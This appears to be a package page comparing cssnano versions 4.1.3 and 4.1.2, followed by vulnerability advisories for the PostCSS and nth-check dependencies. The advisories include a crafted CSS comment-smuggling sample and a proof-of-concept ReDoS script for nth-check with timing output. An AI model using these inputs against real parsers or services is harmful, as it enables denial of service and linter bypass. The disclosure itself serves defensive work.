Cssnano, a modular CSS minifier built on the PostCSS ecosystem, released version 4.1.3 as a minor update to its previous stable version, 4.1.2. Both versions share identical core functionality, dependencies, and development dependencies aimed at optimizing CSS code for production environments. They both rely on PostCSS 7 and cosmiconfig, along with the default preset 4.0.1 to perform CSS minification. These versions also share the exact same tools for development like webpack, babel that are used for building and testing the package.
The key difference lies in the dist field, reflecting the packaged size and release time. Version 4.1.3 has an unpacked size of 27453 bytes, slightly larger than version 4.1.2's 27327 bytes. While seemingly insignificant, this difference indicates internal changes, perhaps bug fixes, performance tweaks, or updated dependencies within the bundled distribution. Version 4.1.3 was released on September 25, 2018, at 14:16:15.178Z, a few hours after the release of 4.1.2.
For developers, both versions offer a robust solution for automated CSS optimization. The negligible size difference shouldn't be a deciding factor unless stringent size constraints are in place. Choosing the latest patch version, 4.1.3, is generally recommended due to the likelihood of inclusive bug fixes and minor improvements. These versions will ensure your CSS is appropriately minified, without any developer intervention, making them appropriate for continuous integration and automatic deployments.
All the vulnerabilities related to the version 4.1.3 of the package
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by @font-face{ font:(\r/*);} in a rule.
This vulnerability affects linters using PostCSS to parse external untrusted CSS. An attacker can prepare CSS in such a way that it will contains parts parsed by PostCSS as a CSS comment. After processing by PostCSS, it will be included in the PostCSS output in CSS nodes (rules, properties) despite being originally included in a comment.
Inefficient Regular Expression Complexity in nth-check
There is a Regular Expression Denial of Service (ReDoS) vulnerability in nth-check that causes a denial of service when parsing crafted invalid CSS nth-checks.
The ReDoS vulnerabilities of the regex are mainly due to the sub-pattern \s*(?:([+-]?)\s*(\d+))? with quantified overlapping adjacency and can be exploited with the following code.
Proof of Concept
// PoC.js
var nthCheck = require("nth-check")
for(var i = 1; i <= 50000; i++) {
var time = Date.now();
var attack_str = '2n' + ' '.repeat(i*10000)+"!";
try {
nthCheck.parse(attack_str)
}
catch(err) {
var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms")
}
}
The Output
attack_str.length: 10003: 174 ms
attack_str.length: 20003: 1427 ms
attack_str.length: 30003: 2602 ms
attack_str.length: 40003: 4378 ms
attack_str.length: 50003: 7473 ms